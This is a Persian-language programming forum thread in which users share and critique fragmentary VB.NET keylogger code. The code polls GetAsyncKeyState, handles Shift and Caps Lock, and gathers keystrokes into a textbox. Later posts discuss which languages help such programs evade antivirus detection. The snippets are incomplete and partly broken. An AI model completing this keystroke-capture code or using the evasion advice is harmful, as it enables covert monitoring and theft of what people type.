PDA

View Full Version : کی لاگر

Mahtab_Tarsa
جمعه 20 اردیبهشت 1392, 18:24 عصر
دوستان عزیز کسی میتونه در مورد دستوراتاین کدها توضیحاتی بگه مثلاهر خط رو توضیح بده کا چکار میکنه
Public Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Dim result As Long
Dim key As String
Dim i As Integer
For i = 2 To 99
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
key = Chr(i)
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i

h_a_m_i_d
شنبه 21 اردیبهشت 1392, 00:41 صبح
چرا همه دوستان برنامه نویس گیر دادن به ویروس نویسی
الان کدوم قسمت این کد رو متوجه نمیشین من نمیدونم از این کد به این واضحی چی رو متوجه نشدین

barnamenevisjavan
شنبه 21 اردیبهشت 1392, 08:26 صبح
توجه رایگان نیست!
http://barnamenevisjavan.com/source/657#more

Mahtab_Tarsa
پنج شنبه 26 اردیبهشت 1392, 22:33 عصر
چرا همه دوستان برنامه نویس گیر دادن به ویروس نویسی
الان کدوم قسمت این کد رو متوجه نمیشین من نمیدونم از این کد به این واضحی چی رو متوجه نشدین
سلام دوست عزیز کسی نگفتش که واضح نیست یا جواب رو بگو یا چیزی نگو کسی کاری با ویروس نویسی نداره و جناب هوشمند وقتی ویروس انسانی پیدا میشه نمیرن رو سرماخوردگی تحقیق کنن بلکه ویروس مورد نظر رو برای کسب اطلاعات بیشتر مو شکافی میکنن هدف ویروس نویسی نیست بلکه طرز کار ویروس هستش که چی باشه بدشم تو هنوز مونده از این چیزا یاد بگیری چون این کد یه ایراد خفنی داره که تو با این غرور زیادت متوجه نمیشی اگه پیداش کردی بهم بگو متوجه نشدی بگو یادت بدم

FastCode
جمعه 27 اردیبهشت 1392, 00:14 صبح
سلام دوست عزیز کسی نگفتش که واضح نیست یا جواب رو بگو یا چیزی نگو کسی کاری با ویروس نویسی نداره و جناب هوشمند وقتی ویروس انسانی پیدا میشه نمیرن رو سرماخوردگی تحقیق کنن بلکه ویروس مورد نظر رو برای کسب اطلاعات بیشتر مو شکافی میکنن هدف ویروس نویسی نیست بلکه طرز کار ویروس هستش که چی باشه بدشم تو هنوز مونده از این چیزا یاد بگیری چون این کد یه ایراد خفنی داره که تو با این غرور زیادت متوجه نمیشی اگه پیداش کردی بهم بگو متوجه نشدی بگو یادت بدم
به جز End Sub فقط ۶ تا ایراد داره که من پیدا کردم.حالا بگو کدوم رو میخواهی حل کنی که من راه حل ۵ تای دیگه رو الکی بهت ندم.چون با این غرور زیادت متوجه نمیشی.

AghaMohsen
جمعه 27 اردیبهشت 1392, 00:23 صبح
دوستان عزیز کسی میتونه در مورد دستوراتاین کدها توضیحاتی بگه مثلاهر خط رو توضیح بده کا چکار میکنه
Public Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
Dim result As Long
Dim key As String
Dim i As Integer
For i = 2 To 99
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
key = Chr(i)
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i

اصلا کلن مشکل داره ، اگه میخوای حروف رو برگردونی ، باید این توری بنویسی که کامل تر هست . هر جاشو خواستی بگو برات توضیح بدم :

Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Integer) As Short
Dim keyPressed, addKey As Object
Dim charCount As Int32

Public Function getShift() As Boolean
getShift = CBool(GetAsyncKeyState(System.Windows.Forms.Keys.S hiftKey))
End Function

For i = 65 To 128
keyPressed = GetAsyncKeyState(i)
If keyPressed = -32767 Then
If getShift() = False Then
If getCapslock() = True Then
addKey = UCase(Chr(i))
Else
addKey = LCase(Chr(i))
End If
Else
If getCapslock() = False Then
addKey = UCase(Chr(i))
Else
addKey = LCase(Chr(i))
End If
End If
GoTo KeyFound
charCount += 1
End If
Next i

prpe26
جمعه 27 اردیبهشت 1392, 01:00 صبح
ویروس و برنامه های مخرب بدرد یادگیری نمیخورند. حداقل تا وقتی در زمینه های حرفه ای امنیت وارد نشدید. برای فان خوبه. ولی برای اینکه بخواید عمرتون رو پای اینا بزارید وقت تلف کردنه.

مثلا اگر به جای این کارها ، زبان های نو پا مثل Lazarus رو فرا بگیرید بیشتر بدردتون خواهد خورد.

این تجربه شخصی بود :چشمک:

Mahtab_Tarsa
جمعه 27 اردیبهشت 1392, 10:59 صبح
ویروس و برنامه های مخرب بدرد یادگیری نمیخورند. حداقل تا وقتی در زمینه های حرفه ای امنیت وارد نشدید. برای فان خوبه. ولی برای اینکه بخواید عمرتون رو پای اینا بزارید وقت تلف کردنه.

مثلا اگر به جای این کارها ، زبان های نو پا مثل Lazarus رو فرا بگیرید بیشتر بدردتون خواهد خورد.

این تجربه شخصی بود :چشمک:

توجه رایگان نیست!
http://barnamenevisjavan.com/source/657#more

هر کمکی هر کسی داشته باشه مورد توجه هستش

prpe26
جمعه 27 اردیبهشت 1392, 18:43 عصر
این برنامه نویس جوان پشنگ از اینور اونور دانلود میکنه میذاره تو سایتش اونم با هزینه ماهیانه نود درصد فایلاش دانلودی هستش

میتونم بپرسم چرا پست من رو نقل قول کردید؟

اگر صرفا میخواید با مفاهیم امنیتی آشنا بشید ، راه بهتری هم هست. حدس میزنم فرق بین کد مخرب ، بد افزار و ویروس رو نمیدونید :) .

h_a_m_i_d
شنبه 28 اردیبهشت 1392, 02:00 صبح
دیگه همینم کم بود از جوجه برنامه نویس ها هم چیزی یاد بگیرم نه برادر من نه من غرور زیاد دارم نه تو برنامه نویس مایکروسافتی
اگه الانم باهات این جوری حرف زدم چون لیاقت نداری اصلا جوابتو داد بعدم من مثل تو بیکار نیستم که صبح تا شب کد بررسی کنم
خداییش با بعضی ها مثل ادم نمیشه حرف زد حتما باید باهاشون مثل چهارپایان حرف زد که بفهمن لیاقتشونو
میزنه کد رو توضیح بده بعد میگه مشکلاتشو چرا نمیگی
دوستان عزیز در حمایت از اقای barnamenevisjavan میگم
کسی شما رو مجبور نکرده تو سایتشون ثبت نام کنی هر کسی خواست میتونه با شرایطی که ایشون صلاح دونستن تو سایت ثبت نام کنن

ali reza mansoori 2
شنبه 28 اردیبهشت 1392, 20:42 عصر
برای ساخت این جور برنامه ها نباید سراغ زبان های برید که تحت فریم ورک اجرا میشن

barnamenevisjavan
پنج شنبه 02 خرداد 1392, 18:53 عصر
یه دلیل داره که باید این برنامه با دات نت ساخته بشه!البته نسخه 2 تا روی اکثر سیستم ها اجرا بشه!دلیلش میتونه این باشه که آنتی ویروس ها خیلی خیلی کمتر به برنامه شک بکنن درضمن روش استفاده هم خیلی مهمه شاید یکی بیاد از تابع داخلی دات نت استفاده کنه یا کسی خودش کلیدهارو تک تک به برنامه شناسایی کنه!

h_a_m_i_d
پنج شنبه 02 خرداد 1392, 23:04 عصر
یه دلیل داره که باید این برنامه با دات نت ساخته بشه!البته نسخه 2 تا روی اکثر سیستم ها اجرا بشه!دلیلش میتونه این باشه که آنتی ویروس ها خیلی خیلی کمتر به برنامه شک بکنن درضمن روش استفاده هم خیلی مهمه شاید یکی بیاد از تابع داخلی دات نت استفاده کنه یا کسی خودش کلیدهارو تک تک به برنامه شناسایی کنه!
شاید حرف شما درست باشه ولی این برنامه ها باید بدون استفاده از تکنولوژی .net ساخته بشه که بتونه روی همه کامپیوتر ها اجرا بشه این که با .net بخوایم ویروس خوب نوشت فقط کار چند تا تازه کار هست مثل دوست عزیزی که میخواست به منم چیزی یاد بده و خیلی هم ادعا داشت قد خ هم از برنامه نویسی سر در نمیاورد :لبخند:
خلاصه حرف من اینه که
شاید بتونید با .net ویروس بنویسید ولی ویروستان در حد حرفه ای نخواهد شد .اگر در حرفم به کسی توهین کردم منو ببخشید البته منظورم اون حیونی که تو تایپیک شرکت کرده بود نیست

barnamenevisjavan
جمعه 03 خرداد 1392, 07:48 صبح
من هم حرف شمارو تایید میکنم!این کار برای افراد متوسط و مبتدی خوبه وگرن اینکار بایدبا سی+ یا سی نوشته بشه که یکم مشکله چون آنتی ویروس سریعا میفهمه و باید اونقد حرفه ای باشید که نزارید بفهمه